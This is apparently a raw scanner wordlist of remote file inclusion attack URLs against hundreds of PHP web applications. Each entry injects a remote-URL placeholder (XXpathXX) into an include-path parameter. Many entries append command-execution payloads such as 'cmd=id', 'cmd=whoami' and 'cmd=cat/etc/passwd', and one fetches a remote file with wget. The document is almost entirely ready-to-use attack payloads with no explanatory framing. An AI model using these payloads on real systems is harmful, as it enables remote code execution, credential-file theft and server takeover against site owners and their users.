/config.php?returnpath=XXpathXX
|
||||
/config.php?sql_language=XXpathXX?
|
||||
/config.php?xcart_dir=XXpathXX?
|
||||
/config/config_admin.php?INC=XXpathXX?
|
||||
/config/config_main.php?INC=XXpathXX?
|
||||
/config/config_member.php?INC=XXpathXX?
|
||||
/config/dbutil.bck.php?confdir=XXpathXX
|
||||
/config/mysql_config.php?INC=XXpathXX?
|
||||
/config/sender.php?ROOT_PATH=XXpathXX?
|
||||
/configuration.php?absolute_path=XXpathXX?
|
||||
/confirmUnsubscription.php?output=XXpathXX
|
||||
/connect.php?path=XXpathXX
|
||||
/connexion.php?DOCUMENT_ROOT=XXpathXX?
|
||||
/contact.php?blog_theme=XXpathXX
|
||||
/contacts.php?cal_dir=XXpathXX
|
||||
/contenido/external/frontend/news.php?cfg[path][includes]=XXpathXX
|
||||
/content.php?content=XXpathXX
|
||||
/content/admin.php?pwfile=XXpathXX
|
||||
/content/content.php?fileloc=XXpathXX?
|
||||
/content/delete.php?pwfile=XXpathXX
|
||||
/content/modify.php?pwfile=XXpathXX
|
||||
/content/modify_go.php?pwfile=XXpathXX
|
||||
/contrib/forms/evaluation/C_FormEvaluation.class.php?GLOBALS[fileroot]=XXpathXX
|
||||
/contrib/mx_glance_sdesc.php?mx_root_path=XXpathXX
|
||||
/contrib/phpBB2/modules.php?phpbb_root_path=XXpathXX?
|
||||
/controllers/MySQLController.php?baseDir=XXpathXX
|
||||
/controllers/SQLController.php?baseDir=XXpathXX
|
||||
/controllers/SetupController.php?baseDir=XXpathXX
|
||||
/controllers/VideoController.php?baseDir=XXpathXX
|
||||
/controllers/ViewController.php?baseDir=XXpathXX
|
||||
/convert-date.php?cal_dir=XXpathXX
|
||||
/convert/mvcw.php?step=1&vwar_root=XXpathXX
|
||||
/convert/mvcw.php?vwar_root=XXpathXX
|
||||
/core/admin/admin.php?p=admin&absoluteurlXXpathXX
|
||||
/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurlXXpathXX
|
||||
/core/admin/categories_add.php?absoluteurlXXpathXX
|
||||
/core/admin/categories_remove.php?absoluteurlXXpathXX
|
||||
/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurlXXpathXX
|
||||
/core/admin/editdel.php?p=admin&absoluteurlXXpathXX
|
||||
/core/admin/ftpfeature.php?p=admin&absoluteurlXXpathXX
|
||||
/core/admin/login.php?absoluteurlXXpathXX
|
||||
/core/admin/pgRSSnews.php?absoluteurlXXpathXX
|
||||
/core/admin/showcat.php?absoluteurlXXpathXX
|
||||
/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurlXXpathXX
|
||||
/core/archive_cat.php?absoluteurlXXpathXX
|
||||
/core/archive_nocat.php?absoluteurlXXpathXX
|
||||
/core/aural.php?site_absolute_path=XXpathXX
|
||||
/core/aural.php?site_absolute_path=XXpathXX?&cmd=dir
|
||||
/core/editor.php?editor_insert_bottom=XXpathXX
|
||||
/core/includes.php?CMS_ROOT=XXpathXX?
|
||||
/core/recent_list.php?absoluteurlXXpathXX
|
||||
/corpo.php?pagina=XXpathXX
|
||||
/cp2.php?securelib=XXpathXX?
|
||||
/cpe/index.php?repertoire_config=XXpathXX
|
||||
/crea.php?plancia=XXpathXX
|
||||
/creacms/_administration/edition_article/edition_article.php?cfg[document_uri]=XXpathXX?
|
||||
/creacms/_administration/fonctions/get_liste_langue.php?cfg[base_uri_admin]=XXpathXX?
|
||||
/creat_news_all.php?language=XXpathXX
|
||||
/create_file.php?target=XXpathXX?
|
||||
/cron.php?ROOT_PATH=XXpathXX
|
||||
/cron.php?include_path=XXpathXX?
|
||||
/crontab/run_billing.php?config[include_dir]=XXpathXX?
|
||||
/cross.php?url=XXpathXX
|
||||
/custom_vars.php?sys[path_addon]=XXpathXX
|
||||
/customer/product.php?xcart_dir=XXpathXX
|
||||
/cwb/comanda.php?INCLUDE_PATH=XXpathXX?
|
||||
/datei.php?config[root_ordner]=XXpathXX?&cmd=id
|
||||
/db/PollDB.php?CONFIG_DATAREADERWRITER=XXpathXX?
|
||||
/db/mysql/db.inc.php?SPL_CFG[dirroot]=XXpathXX?
|
||||
/dbcommon/include.php?_APP_RELATIVE_PATH=XXpathXX
|
||||
/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=XXpathXX
|
||||
/debugger.php?config_atkroot=XXpathXX
|
||||
/decoder/gallery.php?ccms_library_path=XXpathXX
|
||||
/decoder/markdown.php?ccms_library_path=XXpathXX
|
||||
/defaults_setup.php?ROOT_PATH=XXpathXX?cmd=ls
|
||||
/defines.php?WEBCHATPATH=XXpathXX?
|
||||
/demo/ms-pe02/catalog.php?cid=0&sid='%22&sortfield=title&sortorder=ASC&pagenumber=1&main=XXpathXX&
|
||||
/depouilg.php3?NomVote=XXpathXX?
|
||||
/development.php?root_prefix=XXpathXX?
|
||||
/dfcode.php?DFORUM_PATH=XXpathXX?
|
||||
/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=XXpathXX?
|
||||
/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=XXpathXX?
|
||||
/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=XXpathXX
|
||||
/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=XXpathXX?
|
||||
/dialog.php?CONFIG[MWCHAT_Libs]=XXpathXX?
|
||||
/dialogs/a.php?spaw_dir=XXpathXX?&cmd=id
|
||||
/dialogs/collorpicker.php?spaw_dir=XXpathXX&cmd=id
|
||||
/dialogs/img.php?spaw_dir=XXpathXX?&cmd=id
|
||||
/dialogs/img_library.php?spaw_dir=XXpathXX?&cmd=id
|
||||
/dialogs/table.php?spaw_dir=XXpathXX?&cmd=id
|
||||
/dialogs/td.php?spaw_dir=XXpathXX?&cmd=id
|
||||
/digitaleye_Path/module.php?menu=XXpathXX?
|
||||
/dir/prepend.php?_PX_config[manager_path]=XXpathXX
|
||||
/dir_thatware/config.php?root_path=XXpathXX'
|
||||
/direct.php?rf=XXpathXX
|
||||
/direction/index.php?repertoire_config=XXpathXX
|
||||
/directory/index.php?path=XXpathXX
|
||||
/display.php?pag=XXpathXX
|
||||
/display.php?path=XXpathXX
|
||||
/displayCategory.php?basepath=XXpathXX
|
||||
/dix.php3?url_phpartenaire=XXpathXX
|
||||
/dm-albums/template/album.php?SECURITY_FILE=XXpathXX
|
||||
/doc/admin/index.php?ptinclude=XXpathXX
|
||||
/doceboCore/lib/lib.php?GLOBALS[where_framework]=XXpathXX
|
||||
/doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=XXpathXX
|
||||
/doceboKms/modules/documents/tree.documents.php?GLOBALS[where_framework]=XXpathXX
|
||||
/doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=XXpathXX
|
||||
/doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=XXpathXX
|
||||
/docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=XXpathXX
|
||||
/docs/front-end-demo/cart2.php?workdir=XXpathXX?
|
||||
/dokeos/claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=XXpathXX?&cmd=wget%20XXpathXX
|
||||
/dosearch.php?RESPATH=XXpathXX
|
||||
/download.php?root_prefix=XXpathXX?
|
||||
/download_engine_V1.4.3/addmember.php?eng_dir=XXpathXX
|
||||
/download_engine_V1.4.3/admin/enginelib/class.phpmailer.php?lang_pathr=XXpathXX
|
||||
/download_engine_V1.4.3/admin/includes/spaw/dialogs/colorpicker.php?spaw_root=XXpathXX
|
||||
/downstat1.8/chart.php?art=XXpathXX?
|
||||
/dp_logs.php?HomeDir=XXpathXX
|
||||
/eXPerience2/modules.php?file=XXpathXX
|
||||
/ea-gBook/index_inc.php?inc_ordner=XXpathXX?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1
|
||||
/edit.php?javascript_path=XXpathXX?
|
||||
/editor.php?newsfile=XXpathXX
|
||||
/editprofile.php?pathtohomedir=XXpathXX?
|
||||
/editsite.php?returnpath=XXpathXX
|
||||
/editx/add_address.php?include_dir=XXpathXX
|
||||
/elseif/contenus.php?contenus=XXpathXX
|
||||
/elseif/moduleajouter/articles/fonctions.php?tpelseifportalrepertoire=XXpathXX
|
||||
/elseif/moduleajouter/articles/usrarticles.php?corpsdesign=XXpathXX
|
||||
/elseif/moduleajouter/depot/fonctions.php?tpelseifportalrepertoire=XXpathXX
|
||||
/elseif/moduleajouter/depot/usrdepot.php?corpsdesign=XXpathXX
|
||||
/elseif/moduleajouter/depot/usrdepot.php?corpsdesignXXpathXX
|
||||
/elseif/utilisateurs/coeurusr.php?tpelseifportalrepertoire=XXpathXX
|
||||
/elseif/utilisateurs/commentaire.php?tpelseifportalrepertoire=XXpathXX
|
||||
/elseif/utilisateurs/enregistrement.php?tpelseifportalrepertoire=XXpathXX
|
||||
/elseif/utilisateurs/espaceperso.php?tpelseifportalrepertoire=XXpathXX
|
||||
/elseif/utilisateurs/votes.php?tpelseifportalrepertoire=XXpathXX
|
||||
/email_subscribe.php?root_prefix=XXpathXX?
|
||||
/embed/day.php?path=XXpathXX
|
||||
/enc/content.php?Home_Path=XXpathXX?
|
||||
/engine/Ajax/editnews.php?root_dir=XXpathXX
|
||||
/engine/api/api.class.php?dle_config_api=XXpathXX?
|
||||
/engine/engine.inc.php?absolute_path=XXpathXX
|
||||
/engine/init.php?root_dir=XXpathXX
|
||||
/engine/require.php?MY_ENV[BASE_ENGINE_LOC]=XXpathXX?
|
||||
/enth3/show_joined.php?path=XXpathXX
|
||||
/environment.php?DIR_PREFIX=XXpathXX
|
||||
/epal/index.php?view=XXpathXX?
|
||||
/errors.php?error=XXpathXX
|
||||
/errors/configmode.php?GALLERY_BASEDIR=XXpathXX
|
||||
/errors/needinit.php?GALLERY_BASEDIR=XXpathXX
|
||||
/errors/reconfigure.php?GALLERY_BASEDIR=XXpathXX
|
||||
/errors/unconfigured.php?GALLERY_BASEDIR=XXpathXX
|
||||
/es_custom_menu.php?files_dir=XXpathXX
|
||||
/es_desp.php?files_dir=XXpathXX
|
||||
/es_offer.php?files_dir=XXpathXX
|
||||
/eshow.php?Config_rootdir=XXpathXX
|
||||
/esupport/admin/autoclose.php?subd=XXpathXX?
|
||||
/eva/index.php3?aide=XXpathXX?
|
||||
/eva/index.php3?perso=XXpathXX
|
||||
/eva/index.php?eva[caminho]=XXpathXX
|
||||
/event.php?myevent_path=XXpathXX
|
||||
/event_cal/module/embed/day.php?path=XXpathXX
|
||||
/eventcal2.php.php?path_simpnews=XXpathXX
|
||||
/eventscroller.php?path_simpnews=XXpathXX
|
||||
/example-view/templates/article.php?globals[content_dir]=XXpathXX?
|
||||
/example-view/templates/dates_list.php?globals[content_dir]=XXpathXX?
|
||||
/example-view/templates/root.php?globals[content_dir]=XXpathXX?
|
||||
/example.php?site=XXpathXX
|
||||
/example/gamedemo/inc.functions.php?projectPath=XXpathXX?
|
||||
/examplefile.php?bibtexrootrel=XXpathXX?
|
||||
/examples/patExampleGen/bbcodeSource.php?example=XXpathXX
|
||||
/exception/include.php?_APP_RELATIVE_PATH=XXpathXX
|
||||
/extauth/drivers/ldap.inc.php?clarolineRepositorySys=XXpathXX
|
||||
/extras/mt.php?web_root=XXpathXX
|
||||
/extras/poll/poll.php?file_newsportal=XXpathXX
|
||||
/ezusermanager_pwd_forgott.php?ezUserManager_Path=XXpathXX
|
||||
/faq.php?module_root_path=XXpathXX
|
||||
/faq.php?phpbb_root_path=XXpathXX
|
||||
/fckeditor/editor/dialog/fck_link.php?dirroot=XXpathXX
|
||||
/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Dirroot=XXpathXX
|
||||
/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?dirroot=XXpathXX?&cmd=id
|
||||
/fcring.php?s_fuss=XXpathXX
|
||||
/feed.php?config[root_ordner]=XXpathXX?&cmd=id
|
||||
/feed/index2.php?m=XXpathXX
|
||||
/files/amazon-bestsellers.php?CarpPath=XXpathXX
|
||||
/files/carprss.php?CarpPath=XXpathXX
|
||||
/files/compose-attach.php3?BSX_LIBDIR=XXpathXX
|
||||
/files/compose-menu.php3?BSX_LIBDIR=XXpathXX
|
||||
/files/compose-new.php3?BSX_LIBDIR=XXpathXX
|
||||
/files/compose-send.php3?BSX_LIBDIR=XXpathXX
|
||||
/files/folder-create.php3?BSX_LIBDIR=XXpathXX
|
||||
/files/folder-delete.php3?BSX_LIBDIR=XXpathXX
|
||||
/files/folder-empty.php3?BSX_LIBDIR=XXpathXX
|
||||
/files/folder-rename.php3?BSX_LIBDIR=XXpathXX
|
||||
/files/folders.php3?BSX_LIBDIR=XXpathXX
|
||||
/files/login.php3?err=hack&BSX_HTXDIR=XXpathXX
|
||||
/files/mainfile.php?page[path]=XXpathXX?&cmd=ls
|
||||
/files/mbox-list.php3?BSX_LIBDIR=XXpathXX
|
||||
/files/message-delete.php3?BSX_LIBDIR=XXpathXX
|
||||
/files/message-forward.php3?BSX_LIBDIR=XXpathXX
|
||||
/files/message-header.php3?BSX_LIBDIR=XXpathXX
|
||||
/files/message-print.php3?BSX_LIBDIR=XXpathXX
|
||||
/files/message-read.php3?BSX_LIBDIR=XXpathXX
|
||||
/files/message-reply.php3?BSX_LIBDIR=XXpathXX
|
||||
/files/message-replyall.php3?BSX_LIBDIR=XXpathXX
|
||||
/files/message-search.php3?BSX_LIBDIR=XXpathXX
|
||||
/findix/index.php?page=XXpathXX?&cmd=id
|
||||
/fishcart_v3/fc_functions/fc_example.php?docroot=XXpathXX
|
||||
/flushcmd/Include/editor/rich_files/class.rich.php?class_path=XXpathXX?
|
||||
/fonctions/template.php?repphp=XXpathXX?
|
||||
/fonctions_racine.php?chemin_lib=XXpathXX
|
||||
/footer.inc.php?settings[footer]=XXpathXX
|
||||
/footer.inc.php?tfooter=XXpathXX?
|
||||
/footer.php?footer_file=XXpathXX
|
||||
/footer.php?op[footer_body]=XXpathXX?
|
||||
/form.php?path=XXpathXX?&cmd=pwd
|
||||
/forum.php?cfg_file=1&fpath=XXpathXX?
|
||||
/forum/forum.php?view=XXpathXX
|
||||
/forum/forum82lib.php3?repertorylevel=XXpathXX?
|
||||
/forum/gesfil.php?repertorylevel=XXpathXX?
|
||||
/forum/lostpassword.php?repertorylevel=XXpathXX?
|
||||
/forum/mail.php?repertorylevel=XXpathXX?
|
||||
/forum/member.php?repertorylevel=XXpathXX?
|
||||
/forum/message.php?repertorylevel=XXpathXX?
|
||||
/forum/search.php?repertorylevel=XXpathXX?
|
||||
/forum/track.php?path=XXpathXX
|
||||
/frame.php?framefile=XXpathXX
|
||||
/ftp.php?path_local=XXpathXX
|
||||
/function.inc.php?path=XXpathXX
|
||||
/function.php?adminfolder=XXpathXX
|
||||
/function.php?gbpfad=XXpathXX
|
||||
/functions.php?include_path=XXpathXX
|
||||
/functions.php?pmp_rel_path=XXpathXX
|
||||
/functions.php?s[phppath]=XXpathXX
|
||||
/functions.php?set_path=XXpathXX?
|
||||
/functions/form.func.php?GLOBALS[PTH][classes]=XXpathXX?
|
||||
/functions/general.func.php?GLOBALS[PTH][classes]=XXpathXX?
|
||||
/functions/groups.func.php?GLOBALS[PTH][classes]=XXpathXX?
|
||||
/functions/js.func.php?GLOBALS[PTH][classes]=XXpathXX?
|
||||
/functions/prepend_adm.php?SETS[path][physical]=XXpathXX
|
||||
/functions/prepend_adm.php?SETS[path][physical]=XXpathXX?
|
||||
/functions/sections.func.php?GLOBALS[PTH][classes]=XXpathXX?
|
||||
/functions/users.func.php?GLOBALS[PTH][classes]=XXpathXX?
|
||||
/functions_mod_user.php?phpbb_root_path=XXpathXX?&cmd=ls
|
||||
/fusebox5.php?FUSEBOX_APPLICATION_PATH=XXpathXX
|
||||
/galerie.php?config[root_ordner]=XXpathXX?cmd=id
|
||||
/gallery/captionator.php?GALLERY_BASEDIR=XXpathXX
|
||||
/gallery/lib/content.php?include=XXpathXX?cmd=ls
|
||||
/gallery/theme/include_mode/template.php?galleryfilesdir=XXpathXX
|
||||
/gallerypath/index.php?includepath=XXpathXX
|
||||
/games.php?id=XXpathXX
|
||||
/games.php?scoreid=XXpathXX
|
||||
/gbook/includes/header.php?abspath=XXpathXX?
|
||||
/gemini/page/forums/bottom.php?lang=XXpathXX?
|
||||
/gen_m3u.php?phpbb_root_path=XXpathXX
|
||||
/genepi.php?topdir=XXpathXX
|
||||
/generate.php?ht_pfad=XXpathXX?
|
||||
/gepi/gestion/savebackup.php?filename=XXpathXX&cmd=cat/etc/passwd
|
||||
/gestArt/aide.php3?aide=XXpathXX?
|
||||
/get_session_vars.php?path_to_smf=XXpathXX
|
||||
/getpage.php?page=online&doc_path=XXpathXX
|
||||
/global.php?abs_path=XXpathXX?
|
||||
/gorum/dbproperty.php?appDirName=XXpathXX
|
||||
/gpb/include/db.mysql.inc.php?root_path=XXpathXX?
|
||||
/gpb/include/gpb.inc.php?root_path=XXpathXX?
|
||||
/graph.php?DOCUMENT_ROOT=XXpathXX?
|
||||
/gruppen.php?config[root_ordner]=XXpathXX?&cmd=id
|
||||
/handlers/email/mod.listmail.php?_PM_[path][handle]=XXpathXX
|
||||
/handlers/page/show.php?sous_rep=XXpathXX
|
||||
/head.php?CONFIG[MWCHAT_Libs]=XXpathXX?
|
||||
/header.inc.php?CssFile=XXpathXX
|
||||
/header.php?path=XXpathXX
|
||||
/header.php?wwwRoot=XXpathXX
|
||||
/help.php?CONFIG[MWCHAT_Libs]=XXpathXX?
|
||||
/help/index.php?show=XXpathXX
|
||||
/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=XXpathXX
|
||||
/helperfunction.php?includedir=XXpathXX
|
||||
/hioxBannerRotate.php?hm=XXpathXX
|
||||
/hioxRandomAd.php?hm=XXpathXX
|
||||
/hioxstats.php?hm=XXpathXX
|
||||
/hioxupdate.php?hm=XXpathXX
|
||||
/home.php?a=XXpathXX
|
||||
/home.php?page=XXpathXX
|
||||
/home.php?pagina=XXpathXX
|
||||
/home/www/images/doc/index2.php?type=XXpathXX
|
||||
/home1.php?ln=XXpathXX
|
||||
/home2.php?ln=XXpathXX
|
||||
/hsList.php?subdir=XXpathXX?&cmd=ls
|
||||
/htdocs/gmapfactory/params.php?gszAppPath=XXpathXX
|
||||
/html/admin/modules/plugin_admin.php?_settings[pluginpath]=XXpathXX
|
||||
/hu/modules/reg-new/modstart.php?mod_dir=XXpathXX?
|
||||
/i_head.php?home=XXpathXX
|
||||
/i_nav.php?home=XXpathXX
|
||||
/iframe.php?file=XXpathXX
|
||||
/image.php?url=XXpathXX???
|
||||
/impex/ImpExData.php?systempath=XXpathXX
|
||||
/import.php?bibtexrootrel=XXpathXX?
|
||||
/importinfo.php?bibtexrootrel=XXpathXX?
|
||||
/in.php?returnpath=XXpathXX
|
||||
/inc/articles.inc.php?GLOBALS[CHEMINMODULES]=XXpathXX
|
||||
/inc/config.inc.php?x[1]=XXpathXX
|
||||
/inc/design.inc.php?dir[data]=XXpathXX
|
||||
/inc/download_center_lite.inc.php?script_root=XXpathXX
|
||||
/inc/formmail.inc.php?script_root=XXpathXX
|
||||
/inc/gabarits.php?cfg_racine=XXpathXX
|
||||
/inc/header.inc.php?ficStyle=XXpathXX
|
||||
/inc/ifunctions.php?GLOBALS[phpQRootDir]=XXpathXX
|
||||
/inc/inc.php?cfg_racine=XXpathXX?
|
||||
/inc/indexhead.php?fileloc=XXpathXX?
|
||||
/inc/irayofuncs.php?irayodirhack=XXpathXX?
|
||||
/inc/libs/Smarty_Compiler.class.php?plugin_file=XXpathXX?
|
||||
/inc/libs/core/core.display_debug_console.php?plugin_file=XXpathXX?
|
||||
/inc/libs/core/core.load_plugins.php?plugin_file=XXpathXX?
|
||||
/inc/libs/core/core.load_resource_plugin.php?plugin_file=XXpathXX?
|
||||
/inc/libs/core/core.process_cached_inserts.php?plugin_file=XXpathXX?
|
||||
/inc/libs/core/core.process_compiled_include.php?plugin_file=XXpathXX?
|
||||
/inc/libs/core/core.read_cache_file.php?plugin_file=XXpathXX?
|
||||
/inc/linkbar.php?cfile=XXpathXX?
|
||||
/inc/login.php?pathCGX=XXpathXX
|
||||
/inc/logingecon.php?pathCGX=XXpathXX
|
||||
/inc/ltdialogo.php?pathCGX=XXpathXX
|
||||
/inc/mtdialogo.php?pathCGX=XXpathXX
|
||||
/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=XXpathXX?
|
||||
/inc/prepend.inc.php?path=XXpathXX?
|
||||
/inc/service.alert.inc.php?SPL_CFG[dirroot]=XXpathXX?
|
||||
/inc/settings.php?inc_dir=XXpathXX
|
||||
/inc/settings.ses.php?SPL_CFG[dirroot]=XXpathXX?
|
||||
/inc/shows.inc.php?cutepath=XXpathXX?
|
||||
/inc/sige_init.php?SYS_PATH=XXpathXX?
|
||||
/inc_group.php?include_path=XXpathXX?
|
||||
/inc_manager.php?include_path=XXpathXX?
|
||||
/inc_newgroup.php.php?include_path=XXpathXX?
|
||||
/inc_smb_conf.php?include_path=XXpathXX?
|
||||
/inc_user.php?include_path=XXpathXX?
|
||||
/include.php?_APP_RELATIVE_PATH=XXpathXX
|
||||
/include.php?gorumDir=XXpathXX
|
||||
/include.php?myng_root=XXpathXX
|
||||
/include.php?path=psp/user.php&site=XXpathXX
|
||||
/include.php?path[docroot]=XXpathXX
|
||||
/include.php?sunPath=XXpathXX
|
||||
/include/Beautifier/Core.php?BEAUT_PATH=XXpathXX
|
||||
/include/HTML_oben.php?include_path=XXpathXX
|
||||
/include/HTML_oben.php?include_path=XXpathXX?
|
||||
/include/SQuery/gameSpy2.php?libpath=XXpathXX
|
||||
/include/bbs.lib.inc.php?site_path=XXpathXX
|
||||
/include/class_yapbbcooker.php?cfgIncludeDirectory=XXpathXX
|
||||
/include/classes.php?INCLUDE_DIR=XXpathXX?
|
||||
/include/client.php?INCLUDE_DIR=XXpathXX?
|
||||
/include/cls_headline_prod.php?INCLUDE_PATH=XXpathXX
|
||||
/include/cls_listorders.php?INCLUDE_PATH=XXpathXX
|
||||
/include/cls_viewpastorders.php?INCLUDE_PATH=XXpathXX
|
||||
/include/common.php?XOOPS_ROOT_PATH=XXpathXX
|
||||
/include/common_functions.php?baros_path=XXpathXX?
|
||||
/include/config.inc.php?racine=XXpathXX
|
||||
/include/copyright.php?tsep_config[absPath]=XXpathXX?cmd=ls
|
||||
/include/customize.php?l=XXpathXX&text=Hello%20World
|
||||
/include/default_header.php?script_path=XXpathXX
|
||||
/include/define.php?INC_DIR=XXpathXX?
|
||||
/include/disp_form.php3?cfg_include_dir=XXpathXX?
|
||||
/include/disp_smileys.php3?cfg_include_dir=XXpathXX?
|
||||
/include/dom.php?path=XXpathXX
|
||||
/include/dtd.php?path=XXpathXX
|
||||
/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=XXpathXX?
|
||||
/include/engine/content/elements/menu.php?CONFIG[AdminPath]=XXpathXX
|
||||
/include/forms.php?INCLUDE_DIR=XXpathXX?
|
||||
/include/global.php?pfad=XXpathXX
|
||||
/include/header.php?cs_base_path=XXpathXX?
|
||||
/include/html/nettools.popup.php?DIR=XXpathXX
|
||||
/include/inc.foot.php?root=XXpathXX
|
||||
/include/inc_ext/spaw/dialogs/table.php?spaw_root=XXpathXX
|
||||
/include/inc_freigabe.php?include_path=XXpathXX?
|
||||
/include/inc_freigabe1.php?include_path=XXpathXX?
|
||||
/include/inc_freigabe3.php?include_path=XXpathXX?
|
||||
/include/include_stream.inc.php?include_path=XXpathXX
|
||||
/include/include_top.php?g_include=XXpathXX
|
||||
/include/includes.php?include_path=XXpathXX
|
||||
/include/index.php3?cfg_include_dir=XXpathXX?
|
||||
/include/init.inc.php?G_PATH=XXpathXX
|
||||
/include/issue_edit.php?INCLUDE_DIR=XXpathXX?
|
||||
/include/lib/lib_slots.php?main_path=XXpathXX
|
||||
/include/lib/lib_stats.php?main_path=XXpathXX?
|
||||
/include/lib/lib_users.php?main_path=XXpathXX?
|
||||
/include/little_news.php3?cfg_include_dir=XXpathXX?
|
||||
/include/livre_include.php?no_connect=lol&chem_absolu=XXpathXX?
|
||||
/include/loading.php?path_include=XXpathXX
|
||||
/include/mail.inc.php?root=XXpathXX
|
||||
/include/menu_builder.php?config[page_dir]=XXpathXX?
|
||||
/include/misc/mod_2checkout/2checkout_return.inc.php?DIR=XXpathXX
|
||||
/include/monitoring/engine/MakeXML.php?fileOreonConf=XXpathXX?
|
||||
/include/parser.php?path=XXpathXX
|
||||
/include/pear/IT.php?basepath=XXpathXX?
|
||||
/include/pear/ITX.php?basepath=XXpathXX?
|
||||
/include/pear/IT_Error.php?basepath=XXpathXX?
|
||||
/include/phpxd/phpXD.php?appconf[rootpath]=XXpathXX?&cmd=id
|
||||
/include/prodler.class.php?sPath=XXpathXX???
|
||||
/include/scripts/export_batch.inc.php?DIR=XXpathXX
|
||||
/include/scripts/run_auto_suspend.cron.php?DIR=XXpathXX
|
||||
/include/scripts/send_email_cache.php?DIR=XXpathXX
|
||||
/include/startup.inc.php?root_path=XXpathXX?
|
||||
/include/themes/themefunc.php?myNewsConf[path][sys][index]=XXpathXX?
|
||||
/include/timesheet.php?config[include_dir]=XXpathXX
|
||||
/include/urights.php?CRM_inc=XXpathXX
|
||||
/includes/admin_board2.php?phpbb_root_path=XXpathXX?ls
|
||||
/includes/admin_logger.php?phpbb_root_path=XXpathXX?ls
|
||||
/includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=XXpathXX?
|
||||
/includes/ajax_listado.php?urlModulo=XXpathXX
|
||||
/includes/archive/archive_topic.php?phpbb_root_path=XXpathXX?
|
||||
/includes/bbcb_mg.php?phpbb_root_path=XXpathXX?
|
||||
/includes/begin.inc.php?PagePrefix=XXpathXX
|
||||
/includes/blogger.php?path_prefix=XXpathXX
|
||||
/includes/class/class_tpl.php?cache_file=XXpathXX?
|
||||
/includes/class_template.php?quezza_root_path=XXpathXX
|
||||
/includes/classes/pctemplate.php?pcConfig[smartyPath]=XXpathXX?cmd
|
||||
/includes/common.inc.php?CONFIG[BASE_PATH]=XXpathXX
|
||||
/includes/common.php?module_root_path=XXpathXX?
|
||||
/includes/common.php?root=XXpathXX?
|
||||
/includes/common.php?root_path=XXpathXX?
|
||||
/includes/config.inc.php?racineTBS=XXpathXX
|
||||
/includes/config/master.inc.php?fm_data[root]=XXpathXX?
|
||||
/includes/connection.inc.php?PagePrefix=XXpathXX
|
||||
/includes/dbal.php?eqdkp_root_path=XXpathXX
|
||||
/includes/events.inc.php?PagePrefix=XXpathXX
|
||||
/includes/footer.html.inc.php?tc_config[app_root]=XXpathXX?
|
||||
/includes/footer.inc.php?PagePrefix=XXpathXX
|
||||
/includes/footer.php?PHPGREETZ_INCLUDE_DIR=XXpathXX
|
||||
/includes/functions.inc.php?sitepath=XXpathXX?
|
||||
/includes/functions.php?location=XXpathXX
|
||||
/includes/functions.php?phpbb_root_path=XXpathXX
|
||||
/includes/functions.php?phpbb_root_path=XXpathXX?
|
||||
/includes/functions/auto_email_notify.php?path_prefix=XXpathXX
|
||||
/includes/functions/html_generate.php?path_prefix=XXpathXX
|
||||
/includes/functions/master.inc.php?fm_data[root]=XXpathXX?
|
||||
/includes/functions/validations.php?path_prefix=XXpathXX
|
||||
/includes/functions_admin.php?phpbb_root_path=XXpathXX?
|
||||
/includes/functions_install.php?vwar_root=XXpathXX
|
||||
/includes/functions_kb.php?phpbb_root_path=XXpathXX?
|
||||
/includes/functions_mod_user.php?phpbb_root_path=XXpathXX?
|
||||
/includes/functions_portal.php?phpbb_root_path=XXpathXX?
|
||||
/includes/functions_user_viewed_posts.php?phpbb_root_path=XXpathXX?
|
||||
/includes/global.php?nbs=XXpathXX?
|
||||
/includes/header.inc.php?PagePrefix=XXpathXX
|
||||
/includes/header.inc.php?dateiPfad=XXpathXX
|
||||
/includes/include_once.php?include_file=XXpathXX
|
||||
/includes/init.php?includepath=XXpathXX?
|
||||
/includes/iplogger.php?phpbb_root_path=XXpathXX?ls
|
||||
/includes/kb_constants.php?module_root_path=XXpathXX
|
||||
/includes/lang/language.php?path_to_root=XXpathXX
|
||||
/includes/lib-account.inc.php?CONF_CONFIG_PATH=XXpathXX?
|
||||
/includes/lib-group.inc.php?CONF_CONFIG_PATH=XXpathXX?
|
||||
/includes/lib-log.inc.php?CONF_CONFIG_PATH=XXpathXX?
|
||||
/includes/lib-mydb.inc.php?CONF_CONFIG_PATH=XXpathXX?
|
||||
/includes/lib-template-mod.inc.php?CONF_CONFIG_PATH=XXpathXX?
|
||||
/includes/lib-themes.inc.php?CONF_CONFIG_PATH=XXpathXX?
|
||||
/includes/logger_engine.php?phpbb_root_path=XXpathXX
|
||||
/includes/menuleft.inc.php?PagePrefix=XXpathXX
|
||||
/includes/mkb.php?phpbb_root_path=XXpathXX?ls
|
||||
/includes/morcegoCMS/adodb/adodb.inc.php?path=XXpathXX
|
||||
/includes/morcegoCMS/morcegoCMS.php?fichero=XXpathXX
|
||||
/includes/mx_common.php?module_root_path=XXpathXX?
|
||||
/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=XXpathXX
|
||||
/includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=XXpathXX
|
||||
/includes/pafiledb_constants.php?module_root_path=XXpathXX
|
||||
/includes/pages.inc.php?PagePrefix=XXpathXX
|
||||
/includes/phpdig/includes/config.php?relative_script_path=XXpathXX
|
||||
/includes/profilcp_constants.php?module_root_path=XXpathXX?
|
||||
/includes/settings.inc.php?approot=XXpathXX
|
||||
/includes/template.php?myevent_path=XXpathXX
|
||||
/includes/themen_portal_mitte.php?phpbb_root_path=XXpathXX
|
||||
